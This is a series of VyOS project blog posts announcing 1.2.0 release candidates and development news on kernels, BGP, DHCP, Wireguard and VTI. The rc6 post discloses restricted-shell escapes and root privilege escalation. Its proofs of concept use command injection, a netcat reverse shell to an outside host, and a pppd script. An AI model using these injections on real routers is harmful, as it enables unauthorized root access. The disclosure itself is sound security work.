VyOS 1.2.0-rc6 is available for download

As usual, every week we make a new release candidate so that people interested in testing can test the changes quickly and people who reported bugs can confirm they are resolved or report further issues.

VyOS 1.2.0-rc6 is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc6

It includes a small but significant number of bugfixes and a couple of removed commands.

Package updates

VyOS 1.2.0-rc6 uses the Linux kernel 4.19.0. The 4.19 kernel will be the next LTS version, it should be a good kernel to stick with for the lifetime of the 1.2.0 release.

The 4.18 kernel was quite buggy, and 4.14.75 had annoying bugs with small packets causing packet loss in Xen that was solved in later versions.

This image also uses built-in drivers for Mellanox cards rather than those built from the official tarball, since they do not build for newer kernels yet. If you are using one of their fifth generation cards, let us know if it works for you.

Wireguard issues

Issues with creating multiple wireguard interfaces (T949) and with wireguard interfaces disappearing after reboot (T943) have been resolved.

Issues with removing long format IPv6 addresses from interfaces

It was always possible to use long format of IPv6 addresses, with leading zeroes, like 2001:db8:0:0:0:0:0:1/64 (T288), but it was impossible to delete them without rebooting the router because iproute2 does compacts addresses at set time and doesn't recognize the short and long forms as the same address. We've added a workaround for it and it should no longer be a problem.

Import route-map not set for IPv4 BGP peer groups

There was an issue with setting import route-map for IPv4 peer groups (T924). I have to admit I simply forgot to convert one of the commands to the new "address-family ipv4-unicast" syntax, so the path existed in the CLI, but was never passed to FRR correctly. Now it should work as expected.

New command for checking VyOS installation integrity

If you, like me, can never remember if you are running a stock image or a modified installation, this is for you.

dmbaturin@vyos:~$ show system-integrity 
The following packages don't fit the image creation time:
build time:     2018-11-06 01:28:00
installed: 2018-11-06 01:44:28  vyos-1x

It only shows is any packages were installed on top of the image, and not whether any files were modified, but that's better than nothing.

Removed commands

The "run show vpn debug detail" operational mode command was removed because it was based on a script that StrongSWAN no longer provides, and reimplementing it is probably more trouble than it's worth since it just aggregates information already available in the logs and output of other commands.

We have also removed the "set service dhcp-relay relay-options port" command. The DHCP RFC nowhere says that servers or relays MAY use a port other than UDP/67, and almost no clients support alternative ports either, so this option hardly has any practical value. If you used to use it, it will disappear from your config. If you actually need it, please tell us about your use case.



The "operator" level is proved insecure and will be removed in the next releases

The operator level in VyOS is a legacy feature that was inherited from the forked Vyatta Core code. It was always relatively obscure, and I don't think anyone really trusted its security, and for good reasons: with our current CLI architecture, real privilege separation is  impossible.

Security researcher Rich Mirch found multiple ways to escape the restricted shell and execute commands with root permissions for the operator level users. Most of those would take a lot of effort to fix, and it's not clear if some of those can be fixed at all. Since any new implementation of a privilege separation system will be incompatible with the old one, and leaving operator level in the system is best described as "security theater", in the next releases that feature will be removed and operator level users will be converted to admin level users.

We will use the "id" UNIX command for demonstration since it's harmless but is not supposed to be available for operator level users. Here are proofs of concept for all vulnerabilities reported by Rich:

Restricted shell escape using the telnet command

Proof of concept:
user1@vyos> telnet "127.0.0.1;bash"
telnet: can't connect to remote host (127.0.0.1): Connection refused
# we are now in real, unrestricted bash

user1@vyos> id
uid=1001(user1) gid=100(users) groups=100(users),...

This problem could potentially be fixed, but since there's no way to introduce global input sanitation, every command would have to be checked and protected individually.

Restricted shell escape using the "monitor command" command

The "monitor command" command allows operator level users to execute any command. Using it in combination with netcat it's possible to launch an unrestricted bash shell:

user1@vyos> monitor command "$(netcat -e /bin/bash 192.168.x.x 9003)"

Connection from 192.168.x.x:59952
id
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)
hostname
vyos

Restricted shell escape using the traffic dump filters

user1@vyos> monitor interfaces ethernet eth0 traffic detail unlimited filter "-w /dev/null 2>/dev/null & bash"
Capturing traffic on eth0 ...

id
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

Restricted shell escape using backtick evaluation as a set command argument

user1@vyos> set "`/bin/bash`"

user1@vyos> id >/dev/tty
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

This one is special because there may not be a way to fix it at all.

Local privilege escalarion using pppd connection scripts

Operator level users are allowed to call pppd for the connect/disconnect commands. Since pppd is executed with root permissions, a malicious operator can execute arbitrary commands as root using a custom PPP connection script.

user1@vyos> echo "id >/dev/tty" > id.sh
user1@vyos> chmod 755 id.sh

Execute the id command as root using the sudo /sbin/pppd command.

user1@vyos> sudo /sbin/pppd connect $PWD/id.sh
uid=0(root) gid=0(root) groups=0(root)

VyOS 1.2.0-rc5 is available for download

As the tradition dictates, the new weekly release candidate is available for download 

Package updates

The following packages have been updated:

  1. Linux kernel to 4.14.75
  2. Mellanox network drivers to 4.4

Bug fixes

SNMP integration with routing protocols

The last bit configuration that is required for it to work is in now, and it should work as expected again. If it doesn't work for you, let us know!

VRRP not working in unicast mode when the RFC-compatible mode is selected

In T933 it was reported that if you configure VRRP in unicast mode and choose to use virtual MACs (RFC compatible mode), both nodes become masters. Now the config option required for this to work is inserted into keepalived config.

DHCP relay now handles the port option correctly

As reported in T938, DHCP relay would not handle the port option correctly. Now it does.

Tag nodes with whitespace

As reported in T253, it was possible to create a tag node with whitespace in its name (e.g. "set system login user "foo bar" authentication..."), but such configs would not be parsed correctly if you try to load them back.

In most cases attempts to create such nodes should be blocked at the syntax validation level, but since old configs with such nodes may exist, and it is impossible to disallow doing that completely at the set command level, we've added support for quoting such nodes properly in the code responsible for displaying and saving configs. Now such configs will load at least partially and produce more descriptive errors when disallowed by individual command syntax.

Commit archive problem with edit levels

As reported in T570, changing the edit level caused the commit archive feature to save only the config at that level to the remote server, for example, if you did "edit interfaces", the archived config would contain nothing but the interfaces subtree.
It was caused by erroneous omission of the option that makes cli-shell-api output the entire config regardless of the edit level and should be fixed now.

The "run monitor traffic interface ... filter" commands now has full support for tcpdump filters

As reported in T931, commands like "run monitor traffic interface eth0 filter ''src 192.0.2.1 or dst 203.0.113.10" would fail. Now the simple mistake that caused it is fixed and such commands should work again.

Compatibility notes

Username restrictions

Related to the whitespace issue, some commands had overly permissive syntax. The "system login user" username format has been restricted to the POSIX portable characters and length below 100 now (that's alphanumeric characters, underscores, hyphens, and dots). If usernames do not conform to the undeniably portable format (alphanumeric and underscores/hyphens only), you will receive a warning.

There may be old configs with unusual usernames, and they now may fail to load. If you run into issues with that restrictions, let us know.

The "inspect" action in firewall rules no longer exists

The "inspect" action was once used for the IPS/IDS functionality, but the IDS (it was Snort) was removed long before VyOS was forked from Vyatta. The now useless action, however, persisted.

Now we have removed it. We think the chance to see it in a real config is very low, and this should have no impact, but if you run into problems, leave a note in T59, and we'll make a migration script.

In other news

The 1.2.0/Crux repositories are now fully separated from the "current" branch repositories, in preparation for the LTS release. This reopens the "current" branch for experimental and potentially unsafe changes so that we can start working on new big rewrites, migration to newer Debian and other things required for the future 1.3.0 release.



VyOS 1.2.0-rc4 is available for download

VyOS 1.2.0-rc4 release candidate is available for download from here

The release includes multiple bug fixes and a few small features.

You can view the complete changelog here.

Here are some highlights:

Bugfix: SNMP and routing protocols

Due to a change in FRR compared to our old Quagga, SNMP support for routing protocols had been broken for a while. Now it should work again.

Bugfix: BGP community lists

Due to another change in FRR, we've had an annoying bug that made it impossible to edit  BGP community list rules after creation (T799).

For now it was fixed using a dirty hack that may slow down community list editing operations somewhat, and the root cause was reported to FRR maintainers. Once they fix it, we can remove the hack easily.

Feature: BGP extended community lists

Support for extended community lists was supposed to be there for a long time, but in reality the commands were broken (T64).
The bug in community lists editing helped us discover that issue, and the commands were fixed.

Here is an example of that feature's syntax:

# show policy extcommunity-list ExctcommunityExample 
 rule 10 {
     action permit
     regex 100000:999
 }
 rule 30 {
     action deny
     regex ^$
 }
[edit]
# show policy route-map ExtcommunityExample 
 rule 10 {
     action permit
     match {
         extcommunity ExctcommunityExample
     }
 }

Please test is and tell us if it works fine for you.

SSH allow-root option

The "service ssh allow-root" is no longer supported. It will be automatically removed from configs first time the upgrade image boots.

It's a common wisdom that logging in as root is not a good idea. We believe this change is going to have a very limited impact at best.  One objection was that automation tools may need it, but all modern tools such as ansible are capable of elevating privileges properly with sudo.

However, if your automation setup is using it, please take it into account. You still have time to do it before 1.2.0 LTS is released.

New drivers and utilities

VyOS now includes updated firmware packages, in particular, new firmware for Broadcom cards that were reported not to work in T708.

The image also includes a few popular diagnostic tools by default, such as htop, atop, and iotop.

VyOS 1.2.0-rc3 is available for download, with BGP large communities and new bugfixes

VyOS 1.2.0-rc3 release candidate is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc3

Thanks to all people testing release candidates, more bugs were uncovered and fixed. But this release also includes a new feature, that was made possible by migration away from our outdated Quagga, namely:

BGP large communities

Since we are using FRR rather than an outdated Quagga version now, we could finally add CLI support for a long requested feature: large communities. Now that RIRs are out of 32-bit AS numbers, it's more relevant than ever.

The syntax is very simple and similar to that of community-lists:
set policy large-community-list Foo rule 10 action permit
set policy large-community-list Foo rule 10 regex 4000000:33333:4444
set policy large-community-list Foo rule 20 action deny
set policy large-community-list Foo rule 20 regex '^$'

set policy route-map Bar rule 10 action permit
set policy route-map Bar rule 10 match large-community large-community-list Foo

set policy route-map Quux rule 10 action permit
set policy route-map Quux rule 10 set large-community 90000:555:111

Note that there are no well-known communities such as "no-export" here, unlike in the classic communities. I also decided not to implement support for "standard" (numbered) large-community-lists and only include "expanded" (named) lists.

Now to the bug fixes.

Directly connected interface-routes

Some hosting providers, for example, Online.net, use an unusual configuration with /32 host addresses, where you are supposed to create an interface-based route to the default gateway address and then create a default route via that address.

While this configuration is against the classic networking common sense, and I'm not a fan of it, it's technically perfectly valid and increasingly common. The Linux kernel network stack uses a "you asked for it, you get it" approach and allows you to do any crazy things, which sometimes turn out surprisingly useful. Our old Quagga, however, would treat such routes as unreachable because the next hop address is not from the same network as assigned on the interface — sound reasoning, but in this situation it was wrong.

The only way to make it work was to add an iproute2 command to the postconfig script, which is cumbesome. Migration to FRR seems to have resolved that issue though. This configuration appears to work fine in my lab:

set interfaces ethernet eth1 address 192.0.0.2.10/32
set protocols static interface-route 203.0.113.1/32 next-hop-interface eth1
set protocols static route 0.0.0.0/0 next-hop 203.0.113.1

This is what the route table looks like: the 203.0.113.1/32 route is treated as directly connected.

vyos@vyos# run show ip route
...
S>  0.0.0.0/0 [1/0] via 203.0.113.1 (recursive), 00:00:03
  *                   via 203.0.113.1, eth1 onlink, 00:00:03
C>* 192.0.2.10/32 is directly connected, eth1, 00:00:03
S>* 203.0.113.1/32 [1/0] is directly connected, eth1, 00:00:03

And this is what it looks like in the kernel:

vyos@vyos# run show ip route forward 
default via 203.0.113.1 dev eth1 proto static metric 20 onlink 
192.168.56.0/24 dev eth0 proto kernel scope link src 192.168.56.13 
203.0.113.1 dev eth1 proto static metric 20 

If you are using online.net or another hosting provider that uses this scheme, please test it and tell us if it works for you without workarounds.

Fixes in bridging and tunnels

Thanks to Kroy from the forum, we tracked down and fixed a few bridging bugs that had been there for a long time but no one noticed.

The first bug was that the system allowed you to remove a bridge that still has active members (T898). Even with that bug fixed, you still could not remove a tunnel interface from a bridge because its own script was faulty (T900).

Both are now fixed, but there are still issues in that script: STP cost and priority options are not functional. We may fix it in the next release candidate.

Additionally, OpenVPN interfaces could not be added to bridges due to a brctl syntax change, as reported by afics in T884. This should also be fixed now.

Image signature check failure confirmation

Armin Fisslthaler (afics) noticed a particularly embarassing bug: when the installer fails to verify image GPG signature (due to missing key or otherwise), it asks if you want to proceed, and suggests that the default option is "No", but if you just hit Enter, it proceeds instead of exiting (T885).
Ewald van Geffen took the time to fix that conditional and now it should no longer haunt us.

Missing release key in the image

Speaking of which, the VyOS release key is now included in the image and signature check should no longer fail.

More fixes

Corrected the syntax for deleting IPv6 next-hop (T800, fix suggested by Merjin).

IPv6 next-hop local value is now validated at set rather than commit time (T897).

Known issues




VyOS 1.2.0-rc2 is available for download, with fixes to wireguard and PBR

The second release candiate is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc2 

We are happy to see so many people test the release candidates! Some bugs were already found and fixed, and we are working on some more bugs found since the release of 1.2.0-rc1. To make already completed fixed available, we are making the second release candidate.

Resolved issues

  • Wireguard module not loading (T881).
  • PBR routes leaking into other tables (T882).
  • Unhandled exception in the wireguard op mode (T883).

Known issues

  • Fail to add an OpenVPN to a bridge group if cost is not specified (T884, let us know if you also see it).
  • commit-confirm doesn't cancel reboot properly (T870).
  • The GPG key for release builds is not included in the image

Stay tuned for the rc3!


First VyOS 1.2.0 release candidate is available for download

This month, the VyOS project turns five years old. In these five years, VyOS has been through highs and lows, up to speculation that the project is dead. Past year has been full of good focused work by the core team and community contributors, but the only way to make use of that work was to use nightly builds, and nightly builds are like a chocolate box a box of WWI era shells—you never know if it blows up when handled or not. Now the codebase has stabilized, and we are ready to present a release candidate. While it has some rough edges, a number of people, including us, are already using recent builds of VyOS 1.2.0 in production, and now it's time to make it public.

VyOS 1.2.0-rc1 is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc1

VyOS 1.2.0 (Crux) is the feature expansion release based on Debian Jessie. The release candidate will be the basis for the future long term support release. You can read the full release notes at https://wiki.vyos.net/wiki/1.2.0/release_notes

New features include:

  • Wireguard support
  • PPPoE server
  • mDNS repeater and broadcast relay
  • Support for IPv6 VRRP and unicast VRRP operation
  • NPTv6
  • Standards-compliant QinQ ethertype option
  • Python APIs for accessing the running config and writing migration scripts (replacements of the Perl Vyatta::Config and XorpConfigParser)
  • New XML-based command definitions
  • New build system that makes it easy to create custom builds with additional repositories and packages
  • SR-IOV support for Intel and Mellanox cards

The following features have been removed:

  • Telnet server
  • p2p filtering

While the base system if Debian Jessie, multiple packages have been updated to much newer versions, for example, the 4.14.65 kernel, StrongSWAN 5.6, and keepalived 2.0.5.

Additionally, our old Quagga has been replaced with FRR, which opens a way to adding support for many more protocols, including multicast routing.

Known issues

Some people reported issues with DMVPN in hub mode (T848).

Some people report an issue with routers responding to all ARP requests when VTI is enabled (T852).

If you use DMVPN or VTI, you may either help with testing and debugging those issues, or wait until the issues are confirmed to be resolved.

What's next

VyOS 1.2.0 will become the LTS release after one or more release candidates.

We are preparing a release model change that will involve splitting VyOS into an LTS branch a (roughly) monthly rolling release made from the latest code from the current branch. Both branches will be entirely open source, but while the rolling release builds will be available free of charge to everyone, the LTS ISO image builds will be only available to those who either contribute to VyOS (code, documentation, and community activities all count) or purchase a subscription. There will always be an option to build the LTS image entirely from source or using package repositories at dev.packages.vyos.net, though commercial support will only be provided for official builds, or by special arrangement.

We are also working on new commercial support plans and pricing models.

The current branch will now be used for developing 1.3.0. Top priorities for 1.3.0 include migration to the next Debian release and rewriting more legacy code to enable better testing and easier addition of new features.

In a sense, VyOS 1.2.0 was a test whether the project can exist independently or not. While 1.1.x was an incremental expansion of the last Vyatta Core release, development of 1.2.0 coincided with mainstream Linux distributions switching to systemd, many packages such as StrongSWAN making big incompatible changes, and parts of VyOS itself reaching the point when bugs could no longer be fixed without a complete rewrite. The build system also had to be rewritten from scratch.

A lot of work went into developing the new infrastructure for Python rewrites, including the new system of command definitions and required libraries. By now a a few components including SSH, SNMP, cron, and DNS forwarding have been rewritten in the new way, and the rewrite movement is gaining momentum.

Let's test and polish the 1.2.0 release, and keep working on making VyOS a better, more easily maintainable platform in the future 1.3.0 release.

VyOS development news in August and September

Most importantly: all but one blockers for the 1.2.0 release candidate are now resolved. Quite obviously, for the release candidate, we want all features that worked in 1.1.8 to work fully.

New release naming scheme

While we are at it, I'd like to announce a small cosmetic change. Until now, our release branches were named after chemical elements. This naming scheme is getting a bit too common though (OpenDayLight is a well known example, but there are more), we decided to change it to something else to avoid confusion and be a bit more original.

The new branch theme is constellations sorted by area (in square degrees), from the smallest to the largest. The 1.2.0 release will be named Crux. Crux, also known as the Southern Cross, is a small but bright and iconic constellation that is depicted on flags of many countries of the southern hemisphere, such as Australia and New Zealand.

The 1.3.0 release will be named Equuleus, which is the latin for little horse (no relation to My Little Pony).

Migration to FRR from Quagga

We have resolved most of the migration problems and latest nightly builds already use FRR instead of our aged Quagga.

It will open a path to implementing many new protocols and features, such as BFD, PIM-SM, and more. What kept us from migrating was lack of support for multiple routing tables, which we need for PBR. FRR added it recently, and by now the last known issue that blocked migration (routes from the default table unintentionally leaking into non-default tables) has been resolved, so we finally can migrate without losing any features.

While I do feel somewhat uneasy about licensing of certain daemons, that are included in the source tree but use a permissive open source license even though they are linked against GPL libraries, we do not believe there's a GPL violation in it as long as the license of the binary package is GPL. Not sharing a modified source code of those daemons with users of the binary package would be a GPL violation, but we keep all source code of every VyOS component public.

New BGP address-family syntax

This is still in the works, but it will make it to the nightly builds soon.

Originally, VyOS used to have IPv6-specific BGP options under "address-family ipv6-unicast", but IPv4 options were directly under neighbor. The historical reason is that originally IPv6 BGP was not supported at all. This syntax was rather inconsistent, and made it hard to quickly see which options are address family specific. We used to stick with that inconsistent syntax just because it was always done that way.

One behaviour change in FRR made us reconsider that. As you may know, in BGP, routing information exchange is completely orthogonal to the session transport: IPv4 routes can be exchanged over a TCP connection established between IPv4 addresses and vice versa. The default behaviour of most, if not all, BGP implementation is to enable both address families regardless of the session transport.

That behaviour can be changed by an option, in VyOS, that's "set protocols bgp ... parameters default no-ipv4-unicast". The old behaviour of Quagga was to apply that only to sessions whose transport is IPv6, which is just as inconsistent. FRR takes that option literally and disabled IPv4 route advertisments for all peers if it's active, unless peers are explicitly activated for the IPv4 address family.

Making VyOS play well with that development requires an option to do that, and "address-family ipv4-unicast" is an obvious candidate, but introducing a special case doesn't feel write. I think moving original options to that subtree is a cleaner solution. Yes, it does require reprogramming your fingers, but when we start adding support for more address families, the original syntax will only start looking even more like an atavism.

This is what the new syntax will look like:
dmbaturin@vyos# show protocols bgp 
 bgp 64444 {
     address-family {
         ipv4-unicast {
             network 192.168.2.0/24 {
             }
         }
     }
     neighbor 10.91.19.1 {
         address-family {
             ipv4-unicast {
                 allowas-in {
                     number 3
                 }
                 as-override
                 default-originate {
                     route-map Foo
                 }
                 maximum-prefix 50
                 route-map {
                     export Bar
                     import Baz
                 }
                 weight 10
             }
         }
         ebgp-multihop 255
         remote-as 64793
     }
}

Node renaming in migration scripts

Renaming nodes is a very common task in config syntax migration, but until now it could only be done very indirectly. The old XorpConfigParser simply could not separate names from values and renaming nodes was usually done by regex replace. In the new vyos.configtree you'd need to delete the old node and recreate it from scratch.

Until now. Lately we introduced a function that does it one step. If you, for whatever reason, wanted to rename "service ssh" subtree to "service secure-shell", you could do it like this:

with open("/config/config.boot") as f:
    config_text = f.read()
config = vyos.configtree.ConfigTree(config.text)

config.rename(["service", "ssh"], "secure-shell")

print(config.to_string())

One of the reason for introducing it is to make it easier to clean up the DHCP server syntax.

DHCP server rewrite

While we are waiting for the FRR fixes, we (Christian Poessinger and I mainly) decided to eliminate one more bit of the legacy code and give DHCP server scripts a rewrite. We also decided to clean up its syntax.

One of the things that always annoyed me was nested nodes for address ranges: "subnet 192.0.2.0/24 start 192.0.2.100 stop 192.0.2.100". Now start and stop will be different nodes, so that they are easy to change independently: "subnet 192.0.2.0/24 range Foo start 192.0.2.100; ... stop 192.0.2.200".

We will also rename the unwieldy "shared-network-name" to "pool". Operational mode commands always used the "pool" terminology, so it will also improve command consistency.

Wireguard support

Thanks to our contributor who goes by hagbard, VyOS now supports wireguard. The work on it is nearly complete, and will be covered in a separate post.

TFTP server support

Thanks to Christian Poessinger, VyOS now has TFTP server. It was a frequently requested feature, and I think it makes sense for people who keep DHCP on the router and do not want to setup another machine for provisioning phones, think clients and so on.

This is an example of TFTP server with all options set:

service {
 tftp-server {
     allow-upload
     directory /config/tftp
     listen-address 192.0.2.10
     port 69
 }
}

DMVPN works again

Thanks to our contributor Runar Borge, we have identified the cause and fixed the issues that broke DMVPN after upgrading to the latest upstream StrongSWAN. It should now work as expected.

L2TP/IPsec works again

One of the blockers introduced by upgrade to StrongSWAN 5.6 was broken L2TP/IPsec. We've adjusted the config to use the new syntax and now it works again.

More to come

We are actively working on getting the codebase ready for the release candidate. Stay tuned for new updates!

VyOS 1.2.0 development news in July

Despite the slow news season and the RAID incident that luckily slowed us down only for a couple of days, I think we've made good progress in July.

First, Kim Hagen got cloud-init to work, even though it didn't make it to the mainline image, and WAAgent required for Azure is not working yet. Some more work, and VyOS will get a much wider cloud platform support. He's also working on Wireguard integration and it's expected to be merged into current soon.

The new VRRP CLI and IPv6 support is another big change, but it's got its own blog post, so I won't stop there and cover things that did not get their own blog posts instead.

IPsec and VTI

While I regard VTI as the most leaky abstraction ever created and always suggest using honest GRE/IPsec instead, I know many people don't really have any choice because their partners or service providers are using it. In older StrongSWAN versions it used to just work.

Updating StrongSWAN to the latest version had an unforeseen and very unpleasant side effect: VTI tunnels stopped working. A workaround in form of "install_routes = no" in /etc/strongswan.d/charon.conf was discovered, but it has an equally bad side effect: site to site tunnels stop working when it's applied.

The root cause of the problem is that for VTI tunnels to work, their traffic selectors have to be set to 0.0.0.0/0 for traffic to match the tunnel, even though actual routing decision is made according to netfilter marks. Unless route insertion is disabled entirely, StrongSWAN thus mistakenly inserts a default route through the VTI peer address, which makes all traffic routed to nowhere.

This is a hard problem without a workaround that is easy and effective. It's an architectural problem in the new StrongSWAN, according to our investigation of its source code and its developer responses, there is simply no way to control route insertion per peer. One developer responded to it with "why, site to site and VTI tunnels are never used on the same machine anyway" — yeah, people are reporting bugs just out of curiosity.

While there is no clean solution within StrongSWAN, this definitely has been a blocker for the release candidate. Reimplementing route insertion with an up/down script proved to be a hard problem since there are lots of cases to handle and complete information about the intended SA may not always be available to scripts. Switching to another IKE implementation seems like an attractive option, but needs a serious evaluation of the alternatives, and a complete rewrite of the IPsec config scripts — which is planned, but will take a while because the legacy scripts is an unmaintainable mess.

I think I've found a workable (even if far from perfect workaround) — instead of inserting missing routes, delete the bad routes. I've made a test setup and it seems to work reasonably well. The obvious issue is that it doesn't prevent bad things from happening, but rather undoes the damage, so there may still be a brief traffic disruption when VTI tunnels go up. Another problem is a possible race condition between StrongSWAN inserting routes and the script deleting them, though I haven't seen it in practice yet and I hope it doesn't exist. But, at least you can now use both VTI and site to site tunnels on the same machine.

For people who want to use VTI exclusively, there is now "set vpn ipsec options disable-route-autoinstall" option that disables route insertion globally, thus removing the possible disruption, at cost of making site to site tunnels impossible to use. That option is disabled by default.

I hope it will be good enough until we find a better solution. Your testing is needed to confirm that it is!